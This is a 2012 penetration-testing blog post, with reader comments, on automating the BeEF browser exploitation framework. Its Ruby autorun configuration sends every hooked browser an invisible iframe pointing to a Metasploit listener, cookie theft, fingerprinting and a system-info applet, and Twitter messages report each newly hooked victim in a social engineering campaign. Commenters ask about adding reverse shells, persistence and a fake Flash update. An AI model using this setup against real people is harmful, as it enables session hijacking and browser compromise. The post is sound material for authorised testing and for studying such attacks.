Monday, August 13, 2012

Happy Hooking! - BeEF autorun and Twitter notify

Today's post is contributed by Ryan Linn.

In previous posts, we’ve looked at both how to use BeEF in a real world pen test, as well as how to use the REST API to automate common tasks in BeEF. In this post, we’re going to take a look at how to use the REST API to auto-run multiple modules at one time, and set up Twitter notification.

Why would we want to do this? In the Real World series, we looked at a number of modules that can be helpful when profiling browsers. But what if we want to run them automatically so we don’t have to point and click for each new hooked zombie? By default, BeEF allows for a single module to be auto-run. But we can auto-run a number of different modules, and even customize them for specific browsers, using the REST API.

Now we can easily manage more zombies coming in at a time from a social engineering campaign. Also, we have ensured that we have maximized the information we can get from the browser regardless of how long a browser is hooked!

To get the scripts, start by going to https://github.com/SpiderLabs/beef_injection_framework and downloading the framework tools. There are two tools that we’ll be looking at in this blog post. The first is the autorun.rb script, which handles the autorun functionality. The second is the dump_mod_info.rb script, which outputs all of the modules we may use.

To get the list of modules, let’s begin by starting our BeEF instance:

$ ./beef
[17:57:07][*] Browser Exploitation Framework (BeEF)
[17:57:07] | Version 0.4.3.6-alpha
[17:57:07] | Website http://beefproject.com
[17:57:07] | Run 'beef -h' for basic help.
[17:57:07] |_ Run 'git pull' to update to the latest revision.
[17:57:08][*] BeEF is loading. Wait a few seconds...
[17:57:08][*] 8 extensions loaded:
[17:57:08] | Events
[17:57:08] | Requester
[17:57:08] | Proxy
[17:57:08] | Console
[17:57:08] | XSSRays
[17:57:08] | Demos
[17:57:08] | Autoloader
[17:57:08] |_ Admin UI
[17:57:08][*] 114 modules enabled.
[17:57:08][*] 2 network interfaces were detected.
[17:57:08][+] running on network interface: 127.0.0.1
[17:57:08] | Hook URL: http://127.0.0.1:3000/hook.js
[17:57:08] |_ UI URL: http://127.0.0.1:3000/ui/panel
[17:57:08][+] running on network interface: 172.16.149.141
[17:57:08] | Hook URL: http://172.16.149.141:3000/hook.js
[17:57:08] |_ UI URL: http://172.16.149.141:3000/ui/panel
[17:57:08][*] RESTful API key: fba4fc47a6d56c4b23b29027a4ea4524c410643f
[17:57:08][*] HTTP Proxy: http://127.0.0.1:6789
[17:57:08][*] BeEF server started (press control+c to stop)

Next, let's dump the list of modules and pipe it into less:

$ ./dump_mod_info.rb | less

The first thing we want to do is to launch a hidden IFRAME that points to our Metasploit instance. To do this, let's find the module that creates a hidden IFRAME.

When we find it in the less output, it looks like this:

MOD: invisible_iframe
Creates an invisible iframe.
OPTIONS:
  [{"name"=>"target", "ui_label"=>"URL", "value"=>"http://beefproject.com/"}]

We have one option to set: the “target.” The value is the URL we want to launch in the hidden IFRAME. To make this module auto-launch in the autorun.rb script, we open the autorun.rb script and find the autorun_mods hash.

The autorun_mods list holds key-value pairs. The key is the name of the module to run, and the value is a hash of options. In this case, if we wanted to just run this one module pointing to http://localhost:8080, then we’d set our autorun_mods to:

@autorun_mods = [
  { 'Invisible_iframe' => {'target' => 'http://127.0.0.1:8080/' }}
]

We want to do more than that though, so let’s add some more fingerprinting in:

@autorun_mods = [
  { 'Invisible_iframe' => {'target' => 'http://127.0.0.1:8080/' }},
  { 'Browser_fingerprinting' => {}},
  { 'Get_cookie' => {}},
  { 'Get_system_info' => {}}
]

This will launch browser fingerprinting, our invisible iframe, try to get the cookies for the visiting page, and launch a Java applet that will try to fingerprint the browser’s system info. Now that this is all set up, we save our autorun.rb script and just run it:

$ ./autorun.rb

Now that the script is running, we launch a browser to get hooked and watch our BeEF window:

[18:11:45][*] New Hooked Browser [ip:127.0.0.1, type:FF-13, os:Linux], hooked domain [127.0.0.1:3000]
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Create Invisible Iframe'
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Fingerprint Browser'
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Get Cookie'
[18:11:50][*] File [/home/sussurro/beef/modules/host/get_system_info/getSystemInfo.class] bound to url [/getSystemInfo.class]
[18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Get System Info'
[18:11:55][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Get Cookie'
[18:11:55][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Create Invisible Iframe'
[18:11:57][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Fingerprint Browser'

We can see from the output that our auto-run script has executed the modules 5 seconds after our initial hook has taken place. This is far faster than if we had done this manually. From here, we can go into the user interface to view the results. Alternatively, the autorun script prints the session, module, and command IDs, which can be used to get the statuses of the run modules programmatically.

While these scripts are a good starting point, you may want to do more customization. This can be done by modifying the Ruby and following the steps in the REST post and documentation.
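An added example (not part of the original post or the BeEF project): a Ruby parser for the console lines shown above that reports, per hooked browser, how many seconds after the hook each module was sent and when execution was reported, and lists modules that never produced a "has executed" line. The function names are hypothetical, and it assumes all timestamps fall on the same day because the log carries no date.

```ruby
# Hook and module event lines copied from the BeEF console output shown in this post.
BEEF_LOG = <<~'LOG'
  [18:11:45][*] New Hooked Browser [ip:127.0.0.1, type:FF-13, os:Linux], hooked domain [127.0.0.1:3000]
  [18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Create Invisible Iframe'
  [18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Fingerprint Browser'
  [18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Get Cookie'
  [18:11:50][*] Hooked browser 127.0.0.1 has been sent instructions from command module 'Get System Info'
  [18:11:55][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Get Cookie'
  [18:11:55][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Create Invisible Iframe'
  [18:11:57][*] Hooked browser 127.0.0.1 has executed instructions from command module 'Fingerprint Browser'
LOG

HOOKED  = /^\[(\d\d:\d\d:\d\d)\]\[\*\] New Hooked Browser \[ip:([^,\]]+)/
COMMAND = /^\[(\d\d:\d\d:\d\d)\]\[\*\] Hooked browser (\S+) has (been sent|executed) instructions from command module '([^']+)'/

# Convert "HH:MM:SS" to seconds since midnight (assumption: no midnight rollover).
def seconds(hms)
  h, m, s = hms.split(':').map(&:to_i)
  h * 3600 + m * 60 + s
end

# Returns { ip => { module => { sent: secs_after_hook, executed: secs_after_hook or nil } } }.
def module_timeline(log)
  hooked_at = {}
  timeline = Hash.new { |h, ip| h[ip] = {} }
  log.each_line do |line|
    if (m = HOOKED.match(line))
      hooked_at[m[2]] = seconds(m[1])
    elsif (m = COMMAND.match(line))
      ts, ip, verb, mod = m.captures
      next unless (base = hooked_at[ip]) # skip browsers whose hook event is not in the log
      entry = (timeline[ip][mod] ||= { sent: nil, executed: nil })
      entry[verb == 'executed' ? :executed : :sent] = seconds(ts) - base
    end
  end
  timeline
end

# Modules that were sent to a browser but never reported as executed.
def unconfirmed(timeline)
  timeline.flat_map do |ip, mods|
    mods.select { |_, t| t[:sent] && t[:executed].nil? }.keys.map { |mod| [ip, mod] }
  end
end

if __FILE__ == $PROGRAM_NAME
  module_timeline(BEEF_LOG).each do |ip, mods|
    mods.each { |mod, t| puts "#{ip} #{mod}: sent=#{t[:sent].inspect} executed=#{t[:executed].inspect} (s after hook)" }
  end
end
```

On the log above, every module is sent at +5s, execution is reported at +10s or +12s, and 'Get System Info' has no execution line in the captured output.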

The final piece we want to add is Twitter notification. Let's have a little birdie tell us when we've hooked our zombies. This will make sure that, if we have a social engineering campaign running, we can both auto-collect data and be notified when we start getting successes.

First we need to create a Twitter application at dev.twitter.com. Once logged in, we want to create our application. Here are the sample settings for my application; notice the permissions that are required to send DMs.

BeEF Notifier Properties

Next, we need to create our personal access tokens for our account. To do this, there should be a link at the bottom of the page to authorize our account. Once we do, we should see another set of information about our access tokens like below:

Access Token

Now we have all of the information we need to configure Twitter notifications in BeEF. We edit extensions/notifications/config.yaml and set enable to true under notifications and under twitter. Finally, we configure our keys from the previous steps and our target usernames, save the file, and we should be all set.

Restart BeEF, log in, and hit the link for the basic demo page, and you should get two DMs like below:

DMs from Twitter

Now you’re all set for your campaign to begin. Sit back, wait on Twitter to tell you when you’ve got zombies, and automate as much as you can to maximize your success rate. Happy Hooking!

42 comments:

  1. If you can run a java applet for fingerprinting, can't you run a reverse shell and persistence too?

  2. I was attempting to run some modules on BeEF at startup, i.e. in the modules insert autorun: true
    I'm using Kali Linux. I thought to use the bleeding edge repositories to update to the very latest beef-xss. Unfortunately I still get the same errors:
    For example
    Unable to load module configuration '/usr/share/beef-xss/modules/host/get_internal_ip/config.yaml'

    Hoped someone could point me in the right direction.

  3. How can I execute a module on BeEF startup?
    I want to execute fake flash update but that error always appears: unable to load bla bla ... please somebody help me
